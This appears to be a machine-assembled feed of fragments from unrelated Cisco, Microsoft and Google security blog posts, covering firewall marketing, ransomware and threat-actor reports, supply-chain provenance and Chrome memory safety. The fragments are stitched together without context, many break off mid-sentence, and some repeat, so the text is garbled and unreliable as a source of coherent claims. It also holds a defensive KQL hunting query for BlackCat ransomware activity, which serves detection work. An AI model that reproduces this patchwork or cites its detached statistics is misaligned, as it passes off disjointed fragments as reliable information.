Follow the series on Security detection with XDRWe’d love to hear what you think.

At Cisco we have a rich history overcoming this challenge with Cisco Secure Firewall.

The study showed that customers realized a 195% in total ROI when managing their firewall fleet through Cisco Secure Firewall Management Center (FMC).

Thanks to the latest features of Cisco Secure Firewall and the ease of management via Firewall Management Center.”We are not done.

IT can control and manage firewall policy from anywhere along with a low-touch provisioning and onboarding process for branch and firewall deployments.

To learn more about Cisco Secure Firewall Management Center, visit our product page and read the entire Forrester report here.

Let us help give you the highlights from a Cisco SecureX perspective!

Device InsightsLet’s start with device insights.

Device insights gives you a comprehensive view into each device’s security posture and management status.

Kenna vulnerability management has already started integrations with Cisco Secure Endpoint, providing vulnerability scores on the OS version, as well as any available fixes.

Check out our recent blog posts for more information about device insights and Kenna and SecureX orchestration!

That’s why we’re building the Cisco Security Cloud — a global, cloud-delivered, integrated platform that secures and connects organizations of any shape and size.

This cloud-native service is aimed at helping you protect users, devices and applications across your entire ecosystem.

Unified – Bringing together core capabilities including policy management, management consoles, and dashboards for better end-to-end security efficacy.

– Bringing together core capabilities including policy management, management consoles, and dashboards for better end-to-end security efficacy.

We will continue working on all aspects of the Security Cloud to improve our customers’ security resilience in the face …

So full, in fact, that the entire SASE vendor market grew 37% in just a year between 2020 and 2021.

Traditional, siloed security solutions aren’t equipped to handle all the challenges that come along with a multi-environment IT reality.

Dell’Oro Group, the trusted source for market information in the telecommunications, enterprise networks, and data center IT infrastructure industries, recognized Cisco as the SASE Market Share Leader in 2021, with 19% of the total market share by revenue.

Wherever you are on your journey to SASE, Cisco Secure has the unparalleled experience and reputation that can support you on your next steps.

Ask a Question, Comment Below, and Stay Connected with Cisco S…

Cisco Secure Firewall stops threats faster, empowers collaboration between teams, and enables consistency across your on-premises, hybrid, and multi-cloud environments.

This integration between Firewall 7.2 and SecureX provides your Firewall with modern cloud-based automation.

With the new one-click integration, simply click “Enable SecureX” in your Firewall Management Center and log into SecureX.

Built In OrchestrationCisco Secure Firewall users now get immense value from SecureX with the orchestration capability built natively into the Firewall.

Proven ResultsA recent Forrester Economic Impact Study of Secure Firewall show that deploying these types of workflows in SecureX with Secure Fir…

The Cisco Secure stack at Black Hat includes SecureX, Umbrella, Malware Analytics, Secure Endpoint (iOS clarity), and Meraki.

Secure Malware Analytics:A Secure Malware Analytics organization admin can create new users in their Threat Grid tenant.

With a new SecureX organization instantiated using SecureX sign-on any new users to the Cisco stack at Black Hat will be using SecureX sign-on.

We look forward to seeing you at Black Hat USA in Las Vegas, 6-11 August 2022!

About Black HatFor more than 20 years, Black Hat has provided attendees with the very latest in information security research, development, and trends.

When contemplating a career change within a different industry, it can be challenging to know where to start.

As the world continues to change, many people are wondering how to transition into cybersecurity without experience.

Learn their top 10 tips for getting a job in cybersecurity.

For those looking to get into cybersecurity with no experience, Edwards suggests, “Pay attention to the jobs posted on cybersecurity career pages and the skills they’re asking for.

Also available are Cisco Certified CyberOps training videos and connection with those learning new cybersecurity skills through the Security Certifications Community and CyberOps Certifications Community.

In part one of this issue of our Black Hat Asia NOC blog, you will find:From attendee to press to volunteer – coming back to Black Hat as NOC volunteer by Humphrey CheungMeraki MR, MS, MX and Systems Manager by Paul FidlerMeraki Scanning API Receiver by Christian ClasenCisco Meraki was asked by Black Hat Events to be the Official Wired and Wireless Network Equipment, for Black Hat Asia 2022, in Singapore, 10-13 May 2022; in addition to providing the Mobile Device Management (since Black Hat USA 2021), Malware Analysis (since Black Hat USA 2016), & DNS (since Black Hat USA 2017) for the Network Operations Center.

As an attendee and press, I took the Black Hat network for granted.

For a few d…

Simplifying Administrator and End-User Experience for Secure AccessDuo strives to make secure access frictionless for employees while reducing the administrative burden on IT (Information Technology) and helpdesk teams.

Active Directory (AD) is the most popular authentication source connected to Duo SSO, accounting for almost 80% of all setups.

We have made it easy for administrators to configure Duo SSO with Microsoft 365 using an out of the box integration.

Cisco Duo Continues to Democratize SecurityThat is a summary of what we have been up to here at Cisco Duo in the past few months.

Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

But the answer to more data, more devices, and more regulations isn’t more point security solutions.

Through research and conversations with customers, we’ve identified four key data security challenges that many organizations face as they implement hybrid work and multicloud environments.

You can dig into our findings and recommendations by signing up and downloading the e-book Blueprint for Data Protection: 4 Breakthrough Ideas for Compliance and Data Security.

Managing security platform complexityIf you have a patchwork system of unintegrated security solutions that you’ve acquired over time, you’re not alone.

Dive deeper into these four challenges and best practices in the e-book Bluepr…

Azure Cosmos DB is a fully managed NoSQL cloud database service for modern app development.

Authentication and authorizationOperating Azure Cosmos DB databases requires valid credentials to be provided for each request.

In the context of Azure Cosmos DB, ARM can be queried to retrieve Cosmos DB access keys, as well as handle requests for changes in the database firewall rules.

Monitoring suspicious key extractionsData traffic of your Azure Cosmos DB accounts—including any attempts to access, read, or change the stored data—is monitored by Microsoft Defender for Azure Cosmos DB.

Detect security threats with Microsoft Defender for Azure Cosmos DBMicrosoft Defender for Azure Cosmos DB is a par…

In their latest Enterprise Email Security Services test, they evaluated email security vendors against a range of real-world email attack scenarios.

Today we are excited to share that Microsoft received an AAA Protection Award for Microsoft Defender for Office 365, the highest possible award that vendors can achieve in this test.

Microsoft Defender for Office 365 helps organizations protect against advanced threats including phishing and business email compromise.

The SE labs report validates that Microsoft Defender for Office 365, part of Microsoft Defender 365, is a leading choice for email protection, used by corporations worldwide.

To learn more about how some customers are using Micros…

Microsoft’s deep understanding of human-operated ransomware attacks, which are powered by a thriving cybercrime gig economy, continuously informs the solutions we deliver to protect customers.

For example, we track human-operated ransomware attacks not only as distinct ransomware payloads, but more importantly, as a series of malicious activities that culminate in the deployment of ransomware.

This instance illustrates the importance of the rapid incrimination of suspicious entities and the prompt disruption of a human-operated ransomware attack.

Detecting anomalies in alerts at the organization levelA human-operated ransomware attack generates a lot of noise in the system.

In this blog, we…

Subsequently, we did a survey to understand the top concerns around the security of IoT devices, and we shared the findings in a previous blog about best practices for managing IoT security concerns.

Edge Secured-core devices help support up-to-date protocols and algorithms that are used for data-in-transit encryption.

We’ve brought the learnings from Secured-core PCs to define the requirements for Edge secured-core devices.

Today, we’re excited to announce the availability of Windows IoT Edge Secured-core devices available in the Azure Certified Device catalog.

Get started with Microsoft SecurityEmail us to request a call for more information about Azure Sphere, Edge Secured-core devices, …

She decided to switch disciplines again after she started working and discovered a passion for solving customer problems.

Now she’s a software engineer in the identity and network access group, working from her native country, Kenya, as part of our Africa Development Center (ADC).

Rebecca’s interview with Igor Sakhnov, Corporate Vice President of Identity Engineering at Microsoft, has been edited for clarity and length.

Also, seeing the way we manage code, the way we collaborate, the way we push and deploy—it’s all been very interesting.

Learn moreLearn more about Microsoft identity and access management.

That’s why I’m excited to share the availability of Microsoft Defender for individuals, a new online security application for Microsoft 365 Personal and Family subscribers.

That is why we are introducing Microsoft Defender for individuals.

The expansion of our security portfolio with Microsoft Defender for individuals is the natural and exciting progression in our journey as a security company.

The Microsoft Defender app is available to Microsoft 365 subscribers beginning today, across Windows, macOS, iOS, and Android.

Read more about the value to Microsoft 365 subscribers and the journey to get here from the Microsoft 365 team, or try Microsoft Defender today.

Ann: When I joined the Commission, I had to train my lawyers on the need to be proactive relating to privacy and security.

In 2018, a new law in the European Union, the General Data Protection Regulation (GDPR), included Privacy by Design.

Brazil also included Privacy by Design in their new privacy law.

The fourth principle is to reject zero-sum models—privacy versus security or privacy versus data utility.

Brooke: With new privacy issues, how can governments and people protect identity data?

The BlackCat ransomware, also known as ALPHV, is a prevalent threat and a prime example of the growing ransomware-as-a-service (RaaS) gig economy.

These commands could vary, as the BlackCat payload allows affiliates to customize execution to the environment.

Distribution of the ransomware payload using PsExec.exe proved to be the most common attack method.

The incidents we’ve observed related to the BlackCat ransomware leverage these two factors, making this threat durable against conventional security and defense approaches that only focus on detecting the ransomware payloads.

DeviceProcessEvents | where ProcessCommandLine has_all("LanmanServer", "parameters", "MaxMpxCt", "65535")Suspiciou…

Check out our Microsoft-sponsored sessionsFrom left to right: Principal Product Manager David Gregory, Principal Program Manager Ramiro Calderon, Principal Program Manager for Decentralized Identity Ankur Patel, and Senior Product Manager Nick Wryter.

In this 25-minute session, Microsoft Principal Product Manager David Gregory and Microsoft Principal Program Manager Ramiro Calderon will explore how the accelerated digital transformation that started in 2020 exposed the challenges of using on-premises federation servers.

In this 25-minute session, Microsoft Principal Product Manager David Gregory and Microsoft Principal Program Manager Ramiro Calderon will explore how the accelerated digital…

Spirits soared at the Microsoft Security Excellence Awards on June 5, 2022.

Formerly known as the Microsoft Security 20/20 Awards, the Microsoft Security Excellence Awards recognizes MISA member success across security during the past 12 months.

Our 2022 Microsoft Security Excellence Awards finalistsA Microsoft cross-functional group decided on this year’s 10 award categories, including 4 categories where MISA members could nominate themselves.

Security ISV of the YearISVs that are all-around powerhouses, show growth potential and have innovative security solutions that integrate with a MISA-qualifying security product.

To learn more about Microsoft Security solutions, visit our website.

Microsoft successfully detected and disabled attack activity abusing OneDrive by a previously undocumented Lebanon-based activity group Microsoft Threat Intelligence Center (MSTIC) tracks as POLONIUM.

Our goal with this blog is to help deter future activity by exposing and sharing the POLONIUM tactics with the community at large.

As with any observed nation-state actor activity, Microsoft directly notifies customers that have been targeted or compromised, providing them with the information they need to secure their accounts.

Observed actor activitySince February 2022, POLONIUM has been observed primarily targeting organizations in Israel with a focus on critical manufacturing, IT, and Isra…

Specifically, Tenable and Microsoft are working together with the intent to integrate Tenable.io with Microsoft Defender for Cloud and Microsoft Sentinel solutions to support vulnerability assessments for hybrid cloud workloads that use FedRAMP moderate.

“The White House’s Cybersecurity Executive Order focuses heavily on Zero Trust initiatives,” said Glen Pendley, Chief Technology Officer, Tenable.

Tenable will work with Microsoft to secure organizations’ on-premises, hybrid, and cloud-native Microsoft Azure Active Directory implementations in the federal space.

To learn more about how Microsoft is bringing together public and private sector leaders to increase cyber resilience, visit our C…

Additionally, it offers an out-of-the-box methodology for analyzing chat logs, extracting IOCs, and improving threat intelligence and defense process using Python.

Compiling and translating chat logsThe leaked chat logs are written in the Russian language.

Translating slangAnalyzing the chat activity timelineOne way to get insights from chat logs is to see its timeline and check the number of discussions per day.

Extracting list of usersRunning the script above using the Conti chat logs yielded a list of 346 unique accounts.

ConclusionThis blog outlines how Python can be used to find valuable threat intelligence from data sets such as chat logs.

We can’t wait to see whether PPP will be able to defend their crown.

For those of you looking to satisfy your late-night hacking hunger: past year's challenges, including Hackceler8 2021 matches, are open-sourced here .

On top of that there are hours of Hackceler8 2020 videos to watch!If you are just starting out in this space, last year’s Beginner’s Quest is a great resource to get started.

Sign up to expand your skill set, meet new friends in the security community, and even watch the pros in action.

For the latest announcements, see g.co/ctf subscribe to our mailing list , or follow us on @GoogleVRP .

These are relatively minor hurdles, though, and we were able to successfully run the tool with only small manual adjustments.

SBOM in the futureIt’s clear that we’re getting very close to achieving the original goal of SBOMs: using them to help manage the risk of vulnerabilities in software.

This increased interest in SBOMs saw another boost after the National Institute of Standards and Technology (NIST) released its Secure Software Development Framework , which requires SBOM information to be available for software.

This is a security problem if the JWT token is presented to a service that lacks its own audience check.

This information can be helpful to determine if any additional action i…

New Details About 2022 GCP VRPWe will pay out a total of $313,337 to the top seven submissions in the 2022 edition of the GCP VRP Prize.

Individual prize amounts will be as follows:1st prize: $133,3372nd prize: $73,3313rd prize: $31,3374th prize: $31,3115th prize: $17,3116th prize: $13,3737th prize: $13,337If you are a security researcher, here's how you can enter the competition for the GCP VRP Prize 2022:Find a vulnerability in a GCP product (check out Google Cloud Free Program to get started).

Your bug needs to be awarded a financial reward to be eligible for the GCP VRP Prize (the GCP VRP Prize money will be in addition to what you received for your bug!).

One of the goals behind the GC…

In this spirit, this post is about our journey of using heap scanning technologies to improve memory safety of C++.

Temporal memory safety refers to the problem of guaranteeing that memory is always accessed with the most up to date information of its structure, its type.

While there is appetite for different languages than C++ with stronger memory safety guarantees, large codebases such as Chromium will use C++ for the foreseeable future.

Chrome even goes further and employs a C++ garbage collector called Oilpan which deviates from regular C++ semantics but provides temporal memory safety where used.

This is similar to a garbage collected system in that it provides temporal memory safety b…

Privileged pods within the context of GKE securityWhile privileged pods can pose a security issue, it’s important to look at them within the overall context of GKE security.

To use a privileged pod as a “trampoline” in GKE, there is a major prerequisite – the attacker has to first execute a successful application compromise and container breakout attack.

While privileged pods can pose a security issue, it’s important to look at them within the overall context of GKE security.

Where privileged pods are required for the operation of a feature, we’ve added additional documentation to illustrate that fact.

In addition to the measures above, we recommend users take advantage of tools that can sc…

With Android 13 we have migrated to a new model for the provisioning of attestation keys to Android devices which is known as Remote Key Provisioning (RKP).

We now have more than 30 components in Android that can be automatically updated through Google Play, including new modules in Android 13 for Bluetooth and ultra-wideband (UWB).

In Android 13 we implemented numerous enhancements to help mitigate potential vulnerabilities that app developers may inadvertently introduce.

In Android 13, app makers can go above and beyond in removing permissions even more proactively on behalf of their users.

Later this year, we’ll begin rolling out a new destination in settings on Android 13 devices that p…

In these attacks, a user thinks they're logging into the intended site, just as in a standard phishing attack.

But instead of deploying a simple static phishing page that saves the victim's email and password when the victim tries to login, the phisher has deployed a web service that logs into the actual website at the same time the user is falling for the phishing page.

In these attacks, a user thinks they're logging into the intended site, just as in a standard phishing attack.

Phishing-resistant authentication using FIDO with security keys or a Bluetooth connection to your phone.

Through these efforts we introduced physical FIDO security keys, such as the Titan Security Key , which preve…

Google,a member of theTo better understand how the Package Analysis program is contributing to supply chain security, we analyzed the nearly 200 malicious packages it captured over a one-month period.

Here’s what we discovered: Despite open source software’s essential role in all software built today, it’s far too easy for bad actors to circulate malicious packages that attack the systems and users running that software.

The Package Analysis program performs dynamic analysis of all packages uploaded to popular open source repositories and catalogs the results in a BigQuery table.

The short time frame and low sophistication needed for finding the results above underscore the challenge facing…

Last year we introduced multiple privacy focused features, enhanced our protections against bad apps and developers, and improved SDK data safety.

The Data safety section launched this week, and developers are required to complete this section for their apps by July 20th.

Last year, we engaged with SDK developers to build a safer Android and Google Play ecosystem.

Our new Security hub helps protect your phone, apps, Google Account, and passwords by giving you a central view of your device’s current configuration.

In addition, Pixels now use new machine learning models that improve the detection of malware in Google Play Protect.

The Squirrel package ‘foo’ The Oppy package ‘baz’ A custom executable, ‘bar’, written by Acme employees.

bar is compiled from source code stored in the same source repo as the Dockerfile.

acorn install downloads ‘foo’ from the Squirrel repo, verifying the VSA, and recording the use of acorn://[email protected] and its VSA in the build.

The build process assembles the SLSA provenance for the container by:Recording the Acme git repo the bar source and Dockerfile came from, into materials.

Creating a signed DSSE with the SLSA provenance and adding it to the output in-toto bundle.

Squirrel will also allow packages to create SLSA 0 policies if they’re not using SLSA compliant infrastructure.

A minimal delegated verification policy might be “allow if trusted-party verified this artifact (identified by digest) as ”.

For example, “allow if trusted-party verified this artifact as at SLSA 3 and it doesn’t have any dependencies less than SLSA 2”.

They could then configure this ID/key pair for use throughout Acme and be confident that any software used has been verified according to Acme policy.

“Squirrel package ‘foo’ must have been built & signed by ‘spiffe://foobar.com/foo-builder, from github.com/foo/acorn-foo, and be SLSA 4”.

The SituationThe Squirrel package ‘foo’ The Oppy package ‘baz’ A custom executable, ‘bar’, written by Acme employeesBasics In order to SLSA, Squirrel, Oppy, and Acme will all need SLSA capable build services.

To support this, Squirrel will qualify some build services at specific SLSA levels (meaning they can produce artifacts up to that level).

In order to SLSA, Squirrel, Oppy, and Acme will all need SLSA capable build services.

should we prioritize asking for foo.tgz to be distributed with native SLSA provenance?).

should we prioritize asking for foo.tgz to be distributed with native SLSA provenance?

This blog post focuses on build provenance, which gives users important information about the build: who performed the release process?

Source provenance describes how the source code was protected, which we’ll cover in future blog posts, so stay tuned.

Source provenance describes how the source code was protected, which we’ll cover in future blog posts, so stay tuned.

The following steps create the trusted builder that is necessary to generate provenance in isolation from the build and maintainer’s interference.

The OIDC protocol requires no hardcoded, long-term secrets be stored in GitHub's secrets, which sidesteps the potential problem of key mismanagement invalidating the SLSA provenanc…

We are paying higher rewards retroactively for eligible Google Nest and Fitbit devices reports submitted in 2021.

And, starting today, for the next six months, will double the reward amount for all new eligible reports applicable to Google Nest & Fitbit devices in scope.

An enhanced rewards programBuilding on our previous programs to improve devices' embedded security posture, we’re bringing all our first-party devices under a single program, starting with Google Nest, Fitbit, and Pixel.

Refer to the Android and Google Devices Security Reward Program for more details.

Starting today, we will introduce a new vulnerability rewards structure for submissions impacting smart home (Google Nest) a…

These efforts have been spearheaded by both browser security teams and dedicated research groups, such as Project Zero.

Flash deprecation : In 2015 and 2016, Flash was a primary exploitation target.

Since some security bugs are inevitable, how a software vendor architects their software (so that the impact of any single bug is limited) and responds to critical security bugs is often much more important than the specifics of any single bug.

Since “memory safety” bugs account for 70% of the exploitable security bugs, we aim to write new parts of Chrome in memory-safe languages.

We strongly advise not focusing on zero-days when making decisions about updates, but instead to assume any Chrome s…